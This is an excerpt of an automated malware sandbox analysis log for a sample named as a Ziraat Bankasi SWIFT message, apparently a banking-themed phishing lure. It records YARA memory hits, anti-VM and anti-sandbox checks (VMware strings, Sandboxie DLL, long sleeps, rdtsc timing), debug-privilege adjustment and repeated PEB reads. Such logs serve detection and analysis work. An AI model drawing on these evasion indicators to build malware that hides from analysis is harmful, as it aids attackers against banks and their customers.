      Source: Yara matchFile source: 00000000.00000002.265449053.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: Ziraat Bankasi Swift Mesaji20221121.exe PID: 2852, type: MEMORYSTR
      Source: Ziraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.265449053.0000000002BB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
      Source: Ziraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.265449053.0000000002BB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exe TID: 4584Thread sleep time: -42186s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exe TID: 416Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\cscript.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018D6DE6 rdtsc 1_2_018D6DE6
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeAPI coverage: 8.8 %
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeThread delayed: delay time: 42186Jump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: explorer.exe, 00000002.00000000.292356152.0000000007AFF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
      Source: explorer.exe, 00000002.00000000.292681099.0000000007B66000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000008
      Source: Ziraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.265449053.0000000002BB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
      Source: explorer.exe, 00000002.00000000.363954635.0000000007BB1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: Ziraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.265449053.0000000002BB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
      Source: explorer.exe, 00000002.00000000.283990154.0000000005EF4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000002.00000003.302064906.000000000F246000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}x1
      Source: explorer.exe, 00000002.00000000.363954635.0000000007BB1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}E2%d
      Source: Ziraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.265449053.0000000002BB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
      Source: explorer.exe, 00000002.00000000.332445871.0000000005F12000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
      Source: Ziraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.265449053.0000000002BB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018D6DE6 rdtsc 1_2_018D6DE6
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01892D8A mov eax, dword ptr fs:[00000030h]1_2_01892D8A
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01892D8A mov eax, dword ptr fs:[00000030h]1_2_01892D8A
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01892D8A mov eax, dword ptr fs:[00000030h]1_2_01892D8A
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01892D8A mov eax, dword ptr fs:[00000030h]1_2_01892D8A
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01892D8A mov eax, dword ptr fs:[00000030h]1_2_01892D8A
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018CA185 mov eax, dword ptr fs:[00000030h]1_2_018CA185
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018BC182 mov eax, dword ptr fs:[00000030h]1_2_018BC182
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018C2581 mov eax, dword ptr fs:[00000030h]1_2_018C2581
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018C2581 mov eax, dword ptr fs:[00000030h]1_2_018C2581
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018C2581 mov eax, dword ptr fs:[00000030h]1_2_018C2581
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018C2581 mov eax, dword ptr fs:[00000030h]1_2_018C2581
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018CFD9B mov eax, dword ptr fs:[00000030h]1_2_018CFD9B
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018CFD9B mov eax, dword ptr fs:[00000030h]1_2_018CFD9B
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018C2990 mov eax, dword ptr fs:[00000030h]1_2_018C2990
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018C61A0 mov eax, dword ptr fs:[00000030h]1_2_018C61A0
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018C61A0 mov eax, dword ptr fs:[00000030h]1_2_018C61A0
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018C35A1 mov eax, dword ptr fs:[00000030h]1_2_018C35A1
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_019151BE mov eax, dword ptr fs:[00000030h]1_2_019151BE
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_019151BE mov eax, dword ptr fs:[00000030h]1_2_019151BE
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_019151BE mov eax, dword ptr fs:[00000030h]1_2_019151BE
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_019151BE mov eax, dword ptr fs:[00000030h]1_2_019151BE
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_019169A6 mov eax, dword ptr fs:[00000030h]1_2_019169A6
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018C1DB5 mov eax, dword ptr fs:[00000030h]1_2_018C1DB5
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018C1DB5 mov eax, dword ptr fs:[00000030h]1_2_018C1DB5
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018C1DB5 mov eax, dword ptr fs:[00000030h]1_2_018C1DB5
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_019605AC mov eax, dword ptr fs:[00000030h]1_2_019605AC
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_019605AC mov eax, dword ptr fs:[00000030h]1_2_019605AC
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01916DC9 mov eax, dword ptr fs:[00000030h]1_2_01916DC9
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01916DC9 mov eax, dword ptr fs:[00000030h]1_2_01916DC9
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01916DC9 mov eax, dword ptr fs:[00000030h]1_2_01916DC9
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01916DC9 mov ecx, dword ptr fs:[00000030h]1_2_01916DC9
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01916DC9 mov eax, dword ptr fs:[00000030h]1_2_01916DC9
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01916DC9 mov eax, dword ptr fs:[00000030h]1_2_01916DC9
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01948DF1 mov eax, dword ptr fs:[00000030h]1_2_01948DF1
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0189B1E1 mov eax, dword ptr fs:[00000030h]1_2_0189B1E1
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0189B1E1 mov eax, dword ptr fs:[00000030h]1_2_0189B1E1
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0189B1E1 mov eax, dword ptr fs:[00000030h]1_2_0189B1E1
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018AD5E0 mov eax, dword ptr fs:[00000030h]1_2_018AD5E0
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018AD5E0 mov eax, dword ptr fs:[00000030h]1_2_018AD5E0
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0195FDE2 mov eax, dword ptr fs:[00000030h]1_2_0195FDE2
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0195FDE2 mov eax, dword ptr fs:[00000030h]1_2_0195FDE2
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0195FDE2 mov eax, dword ptr fs:[00000030h]1_2_0195FDE2
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0195FDE2 mov eax, dword ptr fs:[00000030h]1_2_0195FDE2
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_019241E8 mov eax, dword ptr fs:[00000030h]1_2_019241E8
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01899100 mov eax, dword ptr fs:[00000030h]1_2_01899100
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01899100 mov eax, dword ptr fs:[00000030h]1_2_01899100
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01899100 mov eax, dword ptr fs:[00000030h]1_2_01899100
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01968D34 mov eax, dword ptr fs:[00000030h]1_2_01968D34
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0191A537 mov eax, dword ptr fs:[00000030h]1_2_0191A537
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018B4120 mov eax, dword ptr fs:[00000030h]1_2_018B4120
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018B4120 mov eax, dword ptr fs:[00000030h]1_2_018B4120
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018B4120 mov eax, dword ptr fs:[00000030h]1_2_018B4120
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018B4120 mov eax, dword ptr fs:[00000030h]1_2_018B4120
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018B4120 mov ecx, dword ptr fs:[00000030h]1_2_018B4120
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0195E539 mov eax, dword ptr fs:[00000030h]1_2_0195E539
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018C513A mov eax, dword ptr fs:[00000030h]1_2_018C513A
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018C513A mov eax, dword ptr fs:[00000030h]1_2_018C513A
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018C4D3B mov eax, dword ptr fs:[00000030h]1_2_018C4D3B
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018C4D3B mov eax, dword ptr fs:[00000030h]1_2_018C4D3B
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018C4D3B mov eax, dword ptr fs:[00000030h]1_2_018C4D3B
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0189AD30 mov eax, dword ptr fs:[00000030h]1_2_0189AD30
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018A3D34 mov eax, dword ptr fs:[00000030h]1_2_018A3D34
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018A3D34 mov eax, dword ptr fs:[00000030h]1_2_018A3D34
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018A3D34 mov eax, dword ptr fs:[00000030h]1_2_018A3D34
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018A3D34 mov eax, dword ptr fs:[00000030h]1_2_018A3D34
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018A3D34 mov eax, dword ptr fs:[00000030h]1_2_018A3D34
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018A3D34 mov eax, dword ptr fs:[00000030h]1_2_018A3D34
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018A3D34 mov eax, dword ptr fs:[00000030h]1_2_018A3D34
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018A3D34 mov eax, dword ptr fs:[00000030h]1_2_018A3D34
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018A3D34 mov eax, dword ptr fs:[00000030h]1_2_018A3D34
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018A3D34 mov eax, dword ptr fs:[00000030h]1_2_018A3D34
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018A3D34 mov eax, dword ptr fs:[00000030h]1_2_018A3D34
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018A3D34 mov eax, dword ptr fs:[00000030h]1_2_018A3D34
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018A3D34 mov eax, dword ptr fs:[00000030h]1_2_018A3D34
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018D3D43 mov eax, dword ptr fs:[00000030h]1_2_018D3D43
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018BB944 mov eax, dword ptr fs:[00000030h]1_2_018BB944
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018BB944 mov eax, dword ptr fs:[00000030h]1_2_018BB944
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01913540 mov eax, dword ptr fs:[00000030h]1_2_01913540
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018B7D50 mov eax, dword ptr fs:[00000030h]1_2_018B7D50
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0189C962 mov eax, dword ptr fs:[00000030h]1_2_0189C962
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0189B171 mov eax, dword ptr fs:[00000030h]1_2_0189B171
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0189B171 mov eax, dword ptr fs:[00000030h]1_2_0189B171
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018BC577 mov eax, dword ptr fs:[00000030h]1_2_018BC577
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018BC577 mov eax, dword ptr fs:[00000030h]1_2_018BC577
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01899080 mov eax, dword ptr fs:[00000030h]1_2_01899080
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018A849B mov eax, dword ptr fs:[00000030h]1_2_018A849B
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01913884 mov eax, dword ptr fs:[00000030h]1_2_01913884
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01913884 mov eax, dword ptr fs:[00000030h]1_2_01913884
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018D90AF mov eax, dword ptr fs:[00000030h]1_2_018D90AF
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018C20A0 mov eax, dword ptr fs:[00000030h]1_2_018C20A0
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018C20A0 mov eax, dword ptr fs:[00000030h]1_2_018C20A0
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018C20A0 mov eax, dword ptr fs:[00000030h]1_2_018C20A0
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018C20A0 mov eax, dword ptr fs:[00000030h]1_2_018C20A0
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018C20A0 mov eax, dword ptr fs:[00000030h]1_2_018C20A0
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018C20A0 mov eax, dword ptr fs:[00000030h]1_2_018C20A0
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018CF0BF mov ecx, dword ptr fs:[00000030h]1_2_018CF0BF
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018CF0BF mov eax, dword ptr fs:[00000030h]1_2_018CF0BF
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018CF0BF mov eax, dword ptr fs:[00000030h]1_2_018CF0BF
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01968CD6 mov eax, dword ptr fs:[00000030h]1_2_01968CD6
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0192B8D0 mov eax, dword ptr fs:[00000030h]1_2_0192B8D0
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0192B8D0 mov ecx, dword ptr fs:[00000030h]1_2_0192B8D0
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0192B8D0 mov eax, dword ptr fs:[00000030h]1_2_0192B8D0
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0192B8D0 mov eax, dword ptr fs:[00000030h]1_2_0192B8D0
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0192B8D0 mov eax, dword ptr fs:[00000030h]1_2_0192B8D0
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0192B8D0 mov eax, dword ptr fs:[00000030h]1_2_0192B8D0
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01916CF0 mov eax, dword ptr fs:[00000030h]1_2_01916CF0
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01916CF0 mov eax, dword ptr fs:[00000030h]1_2_01916CF0
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01916CF0 mov eax, dword ptr fs:[00000030h]1_2_01916CF0
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018958EC mov eax, dword ptr fs:[00000030h]1_2_018958EC
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_019514FB mov eax, dword ptr fs:[00000030h]1_2_019514FB
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01964015 mov eax, dword ptr fs:[00000030h]1_2_01964015
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01964015 mov eax, dword ptr fs:[00000030h]1_2_01964015
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01917016 mov eax, dword ptr fs:[00000030h]1_2_01917016
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01917016 mov eax, dword ptr fs:[00000030h]1_2_01917016
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01917016 mov eax, dword ptr fs:[00000030h]1_2_01917016
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01951C06 mov eax, dword ptr fs:[00000030h]1_2_01951C06
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01951C06 mov eax, dword ptr fs:[00000030h]1_2_01951C06
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01951C06 mov eax, dword ptr fs:[00000030h]1_2_01951C06
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01951C06 mov eax, dword ptr fs:[00000030h]1_2_01951C06
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01951C06 mov eax, dword ptr fs:[00000030h]1_2_01951C06
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01951C06 mov eax, dword ptr fs:[00000030h]1_2_01951C06
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01951C06 mov eax, dword ptr fs:[00000030h]1_2_01951C06
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01951C06 mov eax, dword ptr fs:[00000030h]1_2_01951C06
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01951C06 mov eax, dword ptr fs:[00000030h]1_2_01951C06
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01951C06 mov eax, dword ptr fs:[00000030h]1_2_01951C06
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01951C06 mov eax, dword ptr fs:[00000030h]1_2_01951C06
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01951C06 mov eax, dword ptr fs:[00000030h]1_2_01951C06
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01951C06 mov eax, dword ptr fs:[00000030h]1_2_01951C06
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01951C06 mov eax, dword ptr fs:[00000030h]1_2_01951C06
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0196740D mov eax, dword ptr fs:[00000030h]1_2_0196740D
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0196740D mov eax, dword ptr fs:[00000030h]1_2_0196740D
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0196740D mov eax, dword ptr fs:[00000030h]1_2_0196740D
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01916C0A mov eax, dword ptr fs:[00000030h]1_2_01916C0A
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01916C0A mov eax, dword ptr fs:[00000030h]1_2_01916C0A
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01916C0A mov eax, dword ptr fs:[00000030h]1_2_01916C0A
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01916C0A mov eax, dword ptr fs:[00000030h]1_2_01916C0A
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018AB02A mov eax, dword ptr fs:[00000030h]1_2_018AB02A
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018AB02A mov eax, dword ptr fs:[00000030h]1_2_018AB02A
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018AB02A mov eax, dword ptr fs:[00000030h]1_2_018AB02A
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018AB02A mov eax, dword ptr fs:[00000030h]1_2_018AB02A
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018CBC2C mov eax, dword ptr fs:[00000030h]1_2_018CBC2C
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018C002D mov eax, dword ptr fs:[00000030h]1_2_018C002D
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018C002D mov eax, dword ptr fs:[00000030h]1_2_018C002D
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018C002D mov eax, dword ptr fs:[00000030h]1_2_018C002D
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018C002D mov eax, dword ptr fs:[00000030h]1_2_018C002D
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018C002D mov eax, dword ptr fs:[00000030h]1_2_018C002D
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0192C450 mov eax, dword ptr fs:[00000030h]1_2_0192C450
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0192C450 mov eax, dword ptr fs:[00000030h]1_2_0192C450
